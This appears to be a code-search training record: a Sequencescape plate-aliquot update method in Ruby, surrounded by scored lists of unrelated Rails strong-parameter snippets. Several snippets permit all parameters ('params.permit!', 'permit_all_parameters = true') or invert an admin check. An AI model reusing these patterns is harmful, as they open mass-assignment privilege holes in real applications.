"def param_whitelist\n whitelist = [\n :username, :name,\n :parent_id,\n :headline, :description, :video,\n :policy, :signup_mode, :category,\n :website, :facebook, :twitter, :linkedin,\n :founded_at,\n privacy: [\n :events,\n :resources\n ],\n permission: [\n :profile,\n :members,\n :children,\n :statistics,\n :posts,\n :listings,\n :resources,\n :events\n ],\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:parent_id)\n unless current_user.role_in(@community) === 'owner'\n whitelist.delete(:privacy)\n whitelist.delete(:permission)\n end\n end\n \n whitelist\n end",
"def param_whitelist\n if @user.present? && current_user != @user\n return [:followed]\n end\n \n whitelist = [\n :username, :email, :password,\n :first_name, :last_name,\n :birthday, :gender,\n :headline, :biography, :ask_about, :focus,\n :website, :facebook, :linkedin, :twitter, :github,\n roles: [],\n skills: [],\n interests: [],\n privacy: { contact: [] },\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n \n if action_name === 'update'\n whitelist.delete(:email)\n whitelist.delete(:password)\n end\n \n whitelist\n end",
"def user_params \n \tparams.require(:user).permit(:name, :email, :password, :password_confirmation)# preventing CSTR\n end",
"def user_params\n params.permit(:name, :phoneNumber, :address, :postalCode, :local, :link, :counter, :latitude, :longitude) \n end",
"def valid_params_request?; end",
"def strong_params\n params.require(:experience).permit(param_whitelist)\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def whitelist_url_params\n params.require(:whitelist_url).permit(:domain)\n end",
"def allowed_params\n params.require(:allowed).permit(:email)\n end",
"def permitted_params\n []\n end",
"def trim_whitelisted(params, whitelist)\n # remove any parameters that are not whitelisted\n params.each do |key, value|\n # if white listed\n if whitelist.include? key\n # strip the parameters of any extra spaces, save as string\n params[key] = value.to_s.strip\n else\n # delete any unauthorized parameters\n params.delete key\n end\n end\n params\n end",
"def safe_params\n params.permit(:id, :name, :origin, :emails => []); #emails is an array\n end",
"def query_param\n\t\tparams.permit(:first_name, :last_name, :phone)\n\tend",
"def strong_params\n params.require(:success_metric).permit(param_whitelist)\n end",
"def devise_filter\r\n logger.debug(\"In devise_filter =>PARAMS: #{params.inspect}\")\r\n\r\n # White list for sign_up\r\n devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(user_whitelist) }\r\n\r\n # White list for account update\r\n devise_parameter_sanitizer.for(:account_update) { |u| u.permit(user_whitelist, :current_password) }\r\n\r\n # White list for Invitation creation\r\n devise_parameter_sanitizer.for(:invite) { |u| u.permit(:account_type, :email, :invitation_token)}\r\n\r\n # White list for accept invitation\r\n devise_parameter_sanitizer.for(:accept_invitation) { |u| u.permit(user_whitelist, :invitation_token)}\r\n\r\n end",
"def whitelisted_user_params\n params.require(:user).\n permit( :first_name, :last_name, :email,:password,:password_confirmation,:birthday,:gender)\n end",
"def user_params\n ActionController::Parameters.permit_all_parameters = true\n params.require(:user) #.permit(:name, :surname, :phone, :password, :email, :time_zone)\n end",
"def strong_params\n params.require(:metric_change).permit(param_whitelist)\n end",
"def safe_params\n params.require(:user).permit(:name)\n end",
"def get_params\n\t\treturn ActionController::Parameters.new(self.attributes).permit(\"account_id\", \"title\", \"category\", \"introduction\", \"tags\", \"segment_type\", \"visible\", \"status\", \"main_image\")\n\tend",
"def grant_params\n @whitelisted = params.require(:grant).permit(:name, :description, :agency_id, :acronym)\n end",
"def check_params; true; end",
"def param_whitelist\n whitelist = [\n :description,\n :progress,\n :kpi_id\n ]\n \n unless action_name === 'create'\n whitelist.delete(:kpi_id)\n end\n \n whitelist\n end",
"def quote_params\n params.permit!\n end",
"def valid_params?; end",
"def paramunold_params\n params.require(:paramunold).permit!\n end",
"def user_params\n\t\tparams.permit(:nickname, :avatar, :description, :password, :gender, :birthday, :email, :phone, :qq_id, :wechat_id)\n\tend",
"def filtered_parameters; end",
"def user_params\n params.permit(\n \t:id,\n \t:email, \n \t:first_name, \n \t:last_name, \n \t:password, \n \t:confirm_token, \n \t:phone_number,\n \t:facebook_link,\n \t:car_model,\n \t:license_plate)\n end",
"def filtering_params\n params.permit(:email, :name)\n end",
"def check_params\n true\n end",
"def wx_public_params\n params.require(:wx_public).permit(:nickname, :manager, :alias)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def allowed_params\n params.require(:user).permit(:email, :password, :role, :first_name, :last_name, :password_confirmation)\n end",
"def listing_params\n\t\tparams.permit(:address, :transit_info, :rules, :other_info, :lat, :lng)\n\tend",
"def social_account_params\n\t\t\tparams.require(:social_account).permit!\n\t\tend",
"def safe_params\n resurce_name = self.class.resource_name\n params_method_name = \"#{resurce_name}_params\".to_sym\n if params[resurce_name]\n if respond_to?(params_method_name) || private_methods.include?(params_method_name)\n send(params_method_name)\n else\n raise ActiveModel::ForbiddenAttributesError, \"Please, define the '#{params_method_name}' method in #{self.class.name}\"\n end\n end\n end",
"def url_params\n params.require(:url).permit(:short_url, :original_url, :clicks, :ip_addresses)\n end",
"def user_params\n params.require(:user).permit(:uri, :username, :password, :realname, :email, :publicvisible)\n end",
"def model_params\n\t\tparams.require(:manager).permit(\n\t :user_name,\n :password,\n :email,\n \t\t\t)\n\tend",
"def article_params_whitelist\n params.require(:article).permit(:title, :description, category_ids: [])\n end",
"def college_whitelist_params\n params.require(:college_whitelist).permit(:status)\n end",
"def active_code_params\n params[:active_code].permit\n end",
"def filtering_params\n params.permit(:email)\n end",
"def valid_params(params)\n params.permit(:user_id, :photo_id, :originX, :originY, :width, :height)\n end",
"def ip_address_params\n\t\t\tparams.require(:ip_address).permit!\n end",
"def pull_request_params\n whitelist = [\n :url,\n :id,\n :html_url,\n :diff_url,\n :patch_url,\n :issue_url,\n :number,\n :state,\n :locked,\n :title\n ]\n params.require(:pull_request).permit(whitelist)\n end",
"def reserved_params\n params.require(:reserved).permit(:name, :email, :pax, :address, :KTP, :title)\n end",
"def post_params\n if current_user.admin? \n params.permit(:title, :body, :city, :country, :gps_location, :privacy, :visible, :latitude, :longitude, images: [], files: [])\n else \n params.permit(:title, :body, :city, :country, :gps_location, :privacy,:latitude, :longitude, images: [], files: [])\n end \n end",
"def list_params\n params.permit(:name)\n end",
"def filter_parameters; end",
"def filter_parameters; end",
"def vineyard_params\n params.permit(:vineyard_name, :email, :website_url, :phone, :address, :city, :region, :postcode, :country, :specialty, :description, :pet_friendly, :holiday, :tours, :events, :family_friendly, :cover_image, :image_one, :image_two, :image_three, :image_four, :user_id, :base64)\n end",
"def available_activity_params\n # params.require(:available_activity).permit(:type,:geometry,:properties)\n whitelisted = ActionController::Parameters.new({\n type: params.require(:available_activity)[:type],\n geometry: params.require(:available_activity)[:geometry].try(:permit!).to_h,\n properties: params.require(:available_activity)[:properties].try(:permit!).to_h\n }).try(:permit!)\n end",
"def user_params\n params.permit(:name, :username, :email, :password, :img_url, :bg_url, :coinbank)\n end",
"def user_params_pub\n\t \tparams[:user].permit(:hruid)\n\t end",
"def user_params\n params.permit(:id, :email, :password, :nickname, :status, :avatar, :flat_picture, :flatsharing_id, :member,\n :user, :color, :solde)\n end",
"def validate_search_inputs\n @whitelisted = params.fetch(:user, nil)\n if @whitelisted.blank?\n render_error(400, \"#{I18n.t('general_error.params_missing_key')}\": [I18n.t('general_error.params_missing_value', model: \"review\")])\n return\n else\n @whitelisted = @whitelisted.permit(:name, :uen, :description)\n end\n end",
"def param_whitelist\n [\n :title,\n :description,\n :organization,\n :team_id,\n :started_at,\n :finished_at,\n location: [\n :description,\n :street,\n :city,\n :state,\n :zip,\n :country,\n :latitude,\n :longitude\n ]\n ]\n end",
"def url_whitelist; end",
"def admin_social_network_params\n params.require(:social_network).permit!\n end",
"def filter_params\n params.require(:filters).permit(:letters)\n end",
"def origin_params\n params.permit(:country, :state, :city, :postal_code, :address, :description)\n end",
"def valid_params(params)\n params.permit(:login, :first_name, :last_name, \n :password, :password_confirmation)\n end",
"def sensitive_params=(params)\n @sensitive_params = params\n end",
"def permit_request_params\n params.permit(:address)\n end",
"def user_params\n # Ensure a user can't give themselves admin priveleges\n params.delete(:admin) if current_user.admin?\n params.require(:user).permit(:name, :email, :admin, :image)\n end",
"def secure_params\n params.require(:location).permit(:name)\n end",
"def strong_params\n params.require( :setting ).\n permit( :global_scan_limit, :per_user_scan_limit,\n :target_whitelist_patterns, :target_blacklist_patterns )\n end",
"def question_params\n params.require(:survey_question).permit(question_whitelist)\n end",
"def case_insensitive_params\n params.require(:case_insensitive).permit(:name)\n end",
"def empire_master_no_match_params\n params.require(:empire_master_no_match).permit(:uid, :last_name, :list, :search_date, :double, :source)\n end",
"def maintenance_request_params\n params[:maintenance_request].permit! #allow all parameters for now\n end",
"def unwanted_params\n params.require(:unwanted).permit(:title, :description, :image)\n end",
"def url_params\n params[:url].permit(:full)\n end",
"def backend_user_params\n params.permit!\n end",
"def filter_params\n\t\treturn params[:candidate].permit(:name_for_filter)\n\tend",
"def speed_measurement_params\n\n #fuckit, to lazy to deal with permit crap right now\n ActionController::Parameters.permit_all_parameters = true\n\n params[:speed_measurement]\n end",
"def user_params\n params.permit(:name, :age, :username, :display_photo, :password)\n end",
"def get_params\r\n #params.require(:article).permit(:title, :permalink, :content, :source_site, :introtext, :type_id, :order_by, :searchable, :created_by, :edited_by, :published_by, :published_on, :user_id)\r\n params.require(:article).permit!\r\n\r\n end",
"def pub_params\n params.require(:pub).permit(:name, :description, :phone, :email, :hidden, :city_id, :address)\n end",
"def pass_params\n params[:pass].permit(:name, :price, :description, :colour, :events)\n end",
"def droptraining_params\n params.permit(:training_id,:user_id, :utf8, :authenticity_token, :commit)\n end",
"def person_params\n # params whitelist does *not* include admin, sub, remember_token\n # TBD: share this whitelist with the list used by configuration_permitted_parameters\n # TBD: should current_password be on this list? -- for now, leaving off, since it seems to work without\n # NOTE: do not include 'admin' in this list!\n params.require(:person).permit(\n :name, \n :email, \n :description,\n :password, \n :password_confirmation\n )\n end",
"def parameter_params\n params.require(:parameter).permit(:name, :description, :param_code, :param_value, :active_from, :active_to)\n end"
] |
[
"0.69792545",
"0.6781151",
"0.67419964",
"0.674013",
"0.6734356",
"0.6591046",
"0.6502396",
"0.6496313",
"0.6480641",
"0.6477825",
"0.64565",
"0.6438387",
"0.63791263",
"0.63740575",
"0.6364131",
"0.63192815",
"0.62991166",
"0.62978333",
"0.6292148",
"0.6290449",
"0.6290076",
"0.62894756",
"0.6283177",
"0.6242471",
"0.62382483",
"0.6217549",
"0.6214457",
"0.6209053",
"0.6193042",
"0.6177802",
"0.6174604",
"0.61714715",
"0.6161512",
"0.6151757",
"0.6150663",
"0.61461",
"0.61213595",
"0.611406",
"0.6106206",
"0.6105114",
"0.6089039",
"0.6081015",
"0.6071004",
"0.60620916",
"0.6019971",
"0.601788",
"0.6011056",
"0.6010898",
"0.6005122",
"0.6005122",
"0.6001556",
"0.6001049",
"0.59943926",
"0.5992201",
"0.59909594",
"0.5990628",
"0.5980841",
"0.59669393",
"0.59589154",
"0.5958826",
"0.5957911",
"0.5957385",
"0.5953072",
"0.59526145",
"0.5943361",
"0.59386164",
"0.59375334",
"0.59375334",
"0.5933856",
"0.59292704",
"0.59254247",
"0.5924164",
"0.59167904",
"0.59088355",
"0.5907542",
"0.59064597",
"0.5906243",
"0.5898226",
"0.589687",
"0.5896091",
"0.5894501",
"0.5894289",
"0.5891739",
"0.58860534",
"0.5882406",
"0.587974",
"0.58738774",
"0.5869024",
"0.58679986",
"0.5867561",
"0.5865932",
"0.5864461",
"0.58639693",
"0.58617616",
"0.5861436",
"0.5860451",
"0.58602303",
"0.5854586",
"0.58537364",
"0.5850427",
"0.5850199"
] |
0.0
|
-1
|
For an update message, we update the plate in sequencescape setting the updated aliquots.
|
def _call_in_transaction
begin
update_aliquots(s2_resource)
rescue Sequel::Rollback, PlateNotFoundInSequencescape, UnknownSample => e
metadata.reject(:requeue => true)
log.info("Error updating plate aliquots in Sequencescape: #{e}")
raise Sequel::Rollback
rescue TransferRequestNotFound => e
metadata.ack
log.info("Plate update message processed and acknowledged with the warning: #{e}")
else
metadata.ack
log.info("Plate update message processed and acknowledged")
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update_aliquots_in_sequencescape(plate, plate_uuid, date, sample_uuids)\n plate_id = plate_id_by_uuid(plate_uuid)\n\n # wells is a hash associating a location to a well id\n wells = location_wells(plate_id) \n\n # We save the plate wells data from the transfer\n plate.keys.each do |location|\n receptacle_id = wells[location]\n\n # Save aliquots\n if sample_uuids.has_key?(location)\n sample_uuids[location].each do |sample_uuid|\n sample_resource_uuid = db[:uuids].select(:resource_id).where(\n :resource_type => settings[\"sample_type\"],\n :external_id => sample_uuid\n ).first\n\n raise UnknownSample, \"The sample #{sample_uuid} cannot be found in Sequencescape\" unless sample_resource_uuid\n sample_id = sample_resource_uuid[:resource_id]\n tag_id = get_tag_id(sample_id)\n study_id = study_id(sample_id)\n\n aliquot = db[:aliquots].where({\n :receptacle_id => receptacle_id, \n :sample_id => sample_id, \n :tag_id => tag_id\n }).first \n\n # The aliquot is added only if it doesn't exist yet\n unless aliquot\n create_asset_request!(receptacle_id, study_id, date) \n\n db[:aliquots].insert(\n :receptacle_id => receptacle_id,\n :sample_id => sample_id,\n :study_id => study_id,\n :created_at => date,\n :updated_at => date,\n :tag_id => tag_id\n )\n end\n end\n\n # Update or create well_attribute with volume and concentration information\n plate_solvent = plate[location].find { |aliquot| aliquot.type == \"solvent\" }\n plate_aliquot = plate[location].find { |aliquot| aliquot.type != \"solvent\" } \n volume = plate_solvent.quantity if plate_solvent\n concentration = plate_aliquot.out_of_bounds[settings[\"out_of_bounds_concentration_key\"]] if plate_aliquot\n set_well_volume_and_concentration(receptacle_id, volume, concentration, date) if volume || concentration\n\n # If we have a value for the concentration, it means we had received a working\n # dilution plate. We need then to update the concentration of the stock plate' wells\n # involved in the transfer to the working dilution plate.\n if concentration\n transfer_request = db[:requests].where({\n :target_asset_id => receptacle_id,\n :state => settings[\"transfer_request_state\"],\n :request_type_id => settings[\"transfer_request_type_id\"],\n :sti_type => settings[\"transfer_request_sti_type\"]\n }).first\n\n raise TransferRequestNotFound, \"The transfer request cannot be found in 'requests' table for the target_asset_id: #{receptacle_id}.\" unless transfer_request \n source_well_id = transfer_request[:asset_id]\n\n source_concentration = concentration * settings[\"stock_plate_concentration_multiplier\"]\n set_well_volume_and_concentration(source_well_id, nil, source_concentration, date)\n end\n end\n end\n end",
"def update_origin_plates\n # operations that have not yet errored are guarenteed to correspond to correct colonies on the original plates.\n # we will update the associations of the origin plate for each op to reflect this new verified colony\n operations.running.select { |op| op.input(\"PCR\").sample_type.name != 'Plasmid' }.each do |op|\n # Use association map to cleanly deal with data associated to parts of a collection\n colony_pick = op.input(\"PCR\").part.get(:colony_pick).to_i\n origin_plate_id = op.input(\"PCR\").part.get(:origin_plate_id).to_i\n \n if origin_plate_id && Item.exists?(origin_plate_id) && colony_pick\n origin_plate = Item.find(origin_plate_id)\n correct_colonies = origin_plate.get(:correct_colonies) ? origin_plate.get(:correct_colonies) : []\n \n # rely on idempotence of .to_s to normalize correct \n # colony association into an array regardless\n # of whether it started in array or string format.\n correct_colonies.to_s.chomp(']').chomp!('[') #convert Array to string representation if Array and remove brackets (if string: stays the same)\n correct_colonies = correct_colonies.split(\",\") #string array back to array\n \n correct_colonies.push \"c#{colony_pick}\"\n origin_plate.associate(:correct_colonies, correct_colonies)\n end\n end\n end",
"def update_item_data (info)\n operations.each do |op|\n plate = op.input(\"Plate\").item\n if info[\"n#{plate.id}\".to_sym] == 0\n plate.mark_as_deleted\n plate.save\n op.temporary[:delete] = true\n op.error :no_colonies, \"There are no colonies for plate #{plate.id}\"\n else\n plate.associate :num_colonies, info[\"n#{plate.id}\".to_sym]\n plate.associate :status, info[\"s#{plate.id}\".to_sym]\n \n \n checked_ot = ObjectType.find_by_name(\"Checked E coli Plate of Plasmid\")\n plate.store if plate.object_type_id != checked_ot.id\n plate.object_type_id = checked_ot.id\n plate.save\n op.output(\"Plate\").set item: plate\n \n op.plan.associate \"plate_#{op.input(\"Plate\").sample.id}\", plate.id\n end\n end\n end",
"def update() end",
"def update\n # update_move\n # update_tone_change\n update_rotate\n end",
"def update_plate_purpose_in_sequencescape(plate_uuid, date, plate_purpose_id)\n plate_id = plate_id_by_uuid(plate_uuid)\n db[:assets].where(:id => plate_id).update(\n :plate_purpose_id => plate_purpose_id,\n :updated_at => date\n ) \n end",
"def update ; end",
"def update!(**args)\n @plate_support = args[:plate_support] if args.key?(:plate_support)\n end",
"def update!(**args)\n @info = args[:info] if args.key?(:info)\n @phrase = args[:phrase] if args.key?(:phrase)\n end",
"def update!(**args)\n @changed_text = args[:changed_text] if args.key?(:changed_text)\n @provenance = args[:provenance] if args.key?(:provenance)\n @text_anchor = args[:text_anchor] if args.key?(:text_anchor)\n end",
"def update!(**args)\n @deskew_angle = args[:deskew_angle] if args.key?(:deskew_angle)\n @mirrored = args[:mirrored] if args.key?(:mirrored)\n @orientation = args[:orientation] if args.key?(:orientation)\n @textline_order = args[:textline_order] if args.key?(:textline_order)\n @writing_direction = args[:writing_direction] if args.key?(:writing_direction)\n end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update; end",
"def update!(**args)\n @box = args[:box] if args.key?(:box)\n @code = args[:code] if args.key?(:code)\n @label = args[:label] if args.key?(:label)\n @rotated_box = args[:rotated_box] if args.key?(:rotated_box)\n @symbolvariant = args[:symbolvariant] if args.key?(:symbolvariant)\n end",
"def update\n respond_to do |format|\n if @primer.update(primer_params)\n format.html { redirect_to @sequence, notice: 'Primer was successfully updated.' }\n format.json { render :show, status: :ok, location: @sequence }\n else\n format.html { render :edit }\n format.json { render json: @sequence.errors, status: :unprocessable_entity }\n end\n end\n @primer.refine\n @primer.calculate_tm\n @primer.fill_sequence_name\n @primer.calculate_length\n end",
"def update!(**args)\n @e164 = args[:e164] if args.key?(:e164)\n @i18n_data = args[:i18n_data] if args.key?(:i18n_data)\n end",
"def update!(**args)\n @e164 = args[:e164] if args.key?(:e164)\n @i18n_data = args[:i18n_data] if args.key?(:i18n_data)\n end",
"def update\n \n end",
"def update!(**args)\n @is_isolated = args[:is_isolated] if args.key?(:is_isolated)\n @soft_modifier_collection = args[:soft_modifier_collection] if args.key?(:soft_modifier_collection)\n @text_is_generated = args[:text_is_generated] if args.key?(:text_is_generated)\n end",
"def update!(**args)\n @alignment = args[:alignment] if args.key?(:alignment)\n @width = args[:width] if args.key?(:width)\n end",
"def _call_in_transaction\n aliquot_updater = UpdateAliquotsHandler.new(db, bus, log, metadata, s2_resource, settings)\n\n begin \n s2_resource[:plates].each do |plate|\n aliquot_updater.send(:update_aliquots, plate) if plate[:plate].size == SupportedPlateSize\n end\n\n db.transaction(:savepoint => true) do\n begin\n date = s2_resource[:plates].first[:date]\n add_asset_links(s2_resource[:transfer_map], date)\n set_transfer_requests(s2_resource[:transfer_map], date)\n rescue PlateNotFoundInSequencescape => e\n log.info(\"The asset_link and the transfer request has not been set: #{e.message}\")\n end\n end\n rescue Sequel::Rollback, PlateNotFoundInSequencescape, UnknownSample => e\n metadata.reject(:requeue => true)\n log.info(\"Error updating plate aliquots in Sequencescape: #{e}\")\n raise Sequel::Rollback\n else\n metadata.ack\n log.info(\"Plate transfer message processed and acknowledged\")\n end\n end",
"def update!(**args)\n @asr_caption = args[:asr_caption] if args.key?(:asr_caption)\n @saft_document = args[:saft_document] if args.key?(:saft_document)\n end",
"def update_in_saas\n\n return success unless @is_sync_in_saas_needed\n\n SaasApi::OnBoarding::EditBt.new.perform(\n name: @client_token[:name],\n symbol: @client_token[:symbol],\n conversion_factor: @conversion_factor,\n client_id: @client_token[:client_id]\n )\n\n end",
"def update\r\n # write some gangsta code here\r\n end",
"def update!(**args)\n @active_ingredients = args[:active_ingredients] if args.key?(:active_ingredients)\n @alcohol_by_volume = args[:alcohol_by_volume] if args.key?(:alcohol_by_volume)\n @allergens = args[:allergens] if args.key?(:allergens)\n @derived_nutrition_claim = args[:derived_nutrition_claim] if args.key?(:derived_nutrition_claim)\n @directions = args[:directions] if args.key?(:directions)\n @indications = args[:indications] if args.key?(:indications)\n @ingredients = args[:ingredients] if args.key?(:ingredients)\n @nutrition_claim = args[:nutrition_claim] if args.key?(:nutrition_claim)\n @storage_instructions = args[:storage_instructions] if args.key?(:storage_instructions)\n end",
"def update!(**args)\n @message = args[:message] if args.key?(:message)\n @release = args[:release] if args.key?(:release)\n end",
"def update\n \t\n end",
"def update\n \t\n end",
"def update update\n case update.type.to_sym\n when :update_snakes\n snakes = update.msg \n if @client\n begin\n stonedSnakes = snakes.map { |s| {\"name\" => s.get_name, \"tail\" => s.get_tail.to_json} }\n stoneColdKilledSnakes = JSON.dump(stonedSnakes)\n msg = Message.new(\"update_snakes\", stoneColdKilledSnakes)\n @client.puts(JSON.dump(msg))\n rescue Exception => myException\n @log.info \"Exception rescued: #{myException}\"\n @client = nil\n @isBot = true\n end \n end\n when :update_colors\n if @client\n @client.puts(JSON.dump(update))\n end\n when :identity\n if @client\n# @client.puts(JSON.dump(update));\n end\n end\n end",
"def update_release(stuff, release, fields)\r\n\trelease.update(fields)\r\nend",
"def update!(**args)\n @annotation_list = args[:annotation_list] if args.key?(:annotation_list)\n @eval_data = args[:eval_data] if args.key?(:eval_data)\n @qref = args[:qref] if args.key?(:qref)\n @raw_text = args[:raw_text] if args.key?(:raw_text)\n end",
"def update\n \n end",
"def update!(**args)\n @description_anchor_time_ms = args[:description_anchor_time_ms] if args.key?(:description_anchor_time_ms)\n @description_anchor_time_to_matched_time_ms = args[:description_anchor_time_to_matched_time_ms] if args.key?(:description_anchor_time_to_matched_time_ms)\n @edit_distance = args[:edit_distance] if args.key?(:edit_distance)\n @edit_distance_ratio = args[:edit_distance_ratio] if args.key?(:edit_distance_ratio)\n @matched_description_text = args[:matched_description_text] if args.key?(:matched_description_text)\n @matched_span_text = args[:matched_span_text] if args.key?(:matched_span_text)\n end",
"def update!(**args)\n @appeal_explanation = args[:appeal_explanation] if args.key?(:appeal_explanation)\n @dispute_notes = args[:dispute_notes] if args.key?(:dispute_notes)\n @dispute_reason = args[:dispute_reason] if args.key?(:dispute_reason)\n @update_status = args[:update_status] if args.key?(:update_status)\n end",
"def update!(**args)\n @pronoun_entry = args[:pronoun_entry] if args.key?(:pronoun_entry)\n end",
"def update!(**args)\n @edit_distance = args[:edit_distance] if args.key?(:edit_distance)\n @edit_distance_ratio = args[:edit_distance_ratio] if args.key?(:edit_distance_ratio)\n @matched_description_text = args[:matched_description_text] if args.key?(:matched_description_text)\n @matched_frame_time_ms = args[:matched_frame_time_ms] if args.key?(:matched_frame_time_ms)\n @matched_ocr_text = args[:matched_ocr_text] if args.key?(:matched_ocr_text)\n end",
"def update_sound_association\n hash = @character.stance_sound_association\n if hash != nil and hash.keys.include?(@pose+1)\n @character.animation_id = hash[@pose+1]\n end\n end",
"def update!(**args)\n @signature = args[:signature] if args.key?(:signature)\n end",
"def update!(**args)\n @intent_only_no_pii = args[:intent_only_no_pii] if args.key?(:intent_only_no_pii)\n @rewritten_query = args[:rewritten_query] if args.key?(:rewritten_query)\n end",
"def update!(**args)\n @metadata = args[:metadata] if args.key?(:metadata)\n @pronoun_data = args[:pronoun_data] if args.key?(:pronoun_data)\n end",
"def update!(**args)\n @compliant_values = args[:compliant_values] if args.key?(:compliant_values)\n @instructions = args[:instructions] if args.key?(:instructions)\n @remediation_type = args[:remediation_type] if args.key?(:remediation_type)\n end",
"def update!(**args)\n @annotation_list = args[:annotation_list] if args.key?(:annotation_list)\n @eval_data = args[:eval_data] if args.key?(:eval_data)\n @play_more = args[:play_more] if args.key?(:play_more)\n @qref = args[:qref] if args.key?(:qref)\n @raw_text = args[:raw_text] if args.key?(:raw_text)\n end",
"def update!(**args)\n @info = args[:info] if args.key?(:info)\n @phrase = args[:phrase] if args.key?(:phrase)\n @source = args[:source] if args.key?(:source)\n @source_info = args[:source_info] if args.key?(:source_info)\n @target = args[:target] if args.key?(:target)\n end",
"def update!(**args)\n @auto_retrieval_info = args[:auto_retrieval_info] if args.key?(:auto_retrieval_info)\n @ios_receipt = args[:ios_receipt] if args.key?(:ios_receipt)\n @ios_secret = args[:ios_secret] if args.key?(:ios_secret)\n @phone_number = args[:phone_number] if args.key?(:phone_number)\n @play_integrity_token = args[:play_integrity_token] if args.key?(:play_integrity_token)\n @recaptcha_token = args[:recaptcha_token] if args.key?(:recaptcha_token)\n @safety_net_token = args[:safety_net_token] if args.key?(:safety_net_token)\n end",
"def update;end",
"def update!(**args)\n @gx_ids = args[:gx_ids] if args.key?(:gx_ids)\n @primary_keys = args[:primary_keys] if args.key?(:primary_keys)\n end",
"def update!(**args)\n @baseline = args[:baseline] if args.key?(:baseline)\n @box = args[:box] if args.key?(:box)\n @capline = args[:capline] if args.key?(:capline)\n @compact_symbol_boxes = args[:compact_symbol_boxes] if args.key?(:compact_symbol_boxes)\n @confidence = args[:confidence] if args.key?(:confidence)\n @is_from_dictionary = args[:is_from_dictionary] if args.key?(:is_from_dictionary)\n @is_identifier = args[:is_identifier] if args.key?(:is_identifier)\n @is_last_in_sentence = args[:is_last_in_sentence] if args.key?(:is_last_in_sentence)\n @is_numeric = args[:is_numeric] if args.key?(:is_numeric)\n @label = args[:label] if args.key?(:label)\n @penalty = args[:penalty] if args.key?(:penalty)\n @rotated_box = args[:rotated_box] if args.key?(:rotated_box)\n @symbol = args[:symbol] if args.key?(:symbol)\n @alternates = args[:alternates] if args.key?(:alternates)\n @text = args[:text] if args.key?(:text)\n @writing_direction = args[:writing_direction] if args.key?(:writing_direction)\n end",
"def update!(**args)\n @bounding_poly = args[:bounding_poly] if args.key?(:bounding_poly)\n @confidence = args[:confidence] if args.key?(:confidence)\n @orientation = args[:orientation] if args.key?(:orientation)\n @text_anchor = args[:text_anchor] if args.key?(:text_anchor)\n end",
"def update\r\n\r\n end",
"def update!(**args)\n @raw = args[:raw] if args.key?(:raw)\n end",
"def update!(**args)\n @command = args[:command] if args.key?(:command)\n @open_question = args[:open_question] if args.key?(:open_question)\n @polar_question = args[:polar_question] if args.key?(:polar_question)\n @state_of_affairs = args[:state_of_affairs] if args.key?(:state_of_affairs)\n end",
"def update!(**args)\n @accelerated_shopping_signal = args[:accelerated_shopping_signal] if args.key?(:accelerated_shopping_signal)\n @ads_adsai_magic_apfel_apfel_region_finder_annotation = args[:ads_adsai_magic_apfel_apfel_region_finder_annotation] if args.key?(:ads_adsai_magic_apfel_apfel_region_finder_annotation)\n @ads_adsai_magic_magic_page_type_annotation = args[:ads_adsai_magic_magic_page_type_annotation] if args.key?(:ads_adsai_magic_magic_page_type_annotation)\n @ads_shopping_webpx_raw_shopping_annotation = args[:ads_shopping_webpx_raw_shopping_annotation] if args.key?(:ads_shopping_webpx_raw_shopping_annotation)\n @amphtml_signed_exchange_error_details = args[:amphtml_signed_exchange_error_details] if args.key?(:amphtml_signed_exchange_error_details)\n @amphtml_signed_exchange_validation_payload = args[:amphtml_signed_exchange_validation_payload] if args.key?(:amphtml_signed_exchange_validation_payload)\n @analytics_siteid_analytics_property_annotation = args[:analytics_siteid_analytics_property_annotation] if args.key?(:analytics_siteid_analytics_property_annotation)\n @analytics_siteid_analytics_rendered_output = args[:analytics_siteid_analytics_rendered_output] if args.key?(:analytics_siteid_analytics_rendered_output)\n @authentic_site_rank_data = args[:authentic_site_rank_data] if args.key?(:authentic_site_rank_data)\n @babel_encoder_babel_encodings = args[:babel_encoder_babel_encodings] if args.key?(:babel_encoder_babel_encodings)\n @badurls_badurls_force_selection_signal = args[:badurls_badurls_force_selection_signal] if args.key?(:badurls_badurls_force_selection_signal)\n @boilerplate_annotations = args[:boilerplate_annotations] if args.key?(:boilerplate_annotations)\n @boilerplate_visible_bytes_estimates = args[:boilerplate_visible_bytes_estimates] if args.key?(:boilerplate_visible_bytes_estimates)\n @chrome_counts = args[:chrome_counts] if args.key?(:chrome_counts)\n @commerce_dataquality_organic_crawled_seller_data = args[:commerce_dataquality_organic_crawled_seller_data] if args.key?(:commerce_dataquality_organic_crawled_seller_data)\n @commerce_dataquality_organic_shopping_annotation_signal = args[:commerce_dataquality_organic_shopping_annotation_signal] if args.key?(:commerce_dataquality_organic_shopping_annotation_signal)\n @commerce_dataquality_organic_shopping_site_quality = args[:commerce_dataquality_organic_shopping_site_quality] if args.key?(:commerce_dataquality_organic_shopping_site_quality)\n @commonsense_queriosity_goldmine_qna_annotations = args[:commonsense_queriosity_goldmine_qna_annotations] if args.key?(:commonsense_queriosity_goldmine_qna_annotations)\n @commonsense_scored_compound_reference_annotation = args[:commonsense_scored_compound_reference_annotation] if args.key?(:commonsense_scored_compound_reference_annotation)\n @commonsense_stone_soup_proto_raffia_instructions_seq = args[:commonsense_stone_soup_proto_raffia_instructions_seq] if args.key?(:commonsense_stone_soup_proto_raffia_instructions_seq)\n @contra_content_review_annotations = args[:contra_content_review_annotations] if args.key?(:contra_content_review_annotations)\n @contra_curated_content = args[:contra_curated_content] if args.key?(:contra_curated_content)\n @country_country_attachment = args[:country_country_attachment] if args.key?(:country_country_attachment)\n @crawzall_signal = args[:crawzall_signal] if args.key?(:crawzall_signal)\n @creator = args[:creator] if args.key?(:creator)\n @datacommons_datacommons_triples_signal = args[:datacommons_datacommons_triples_signal] if 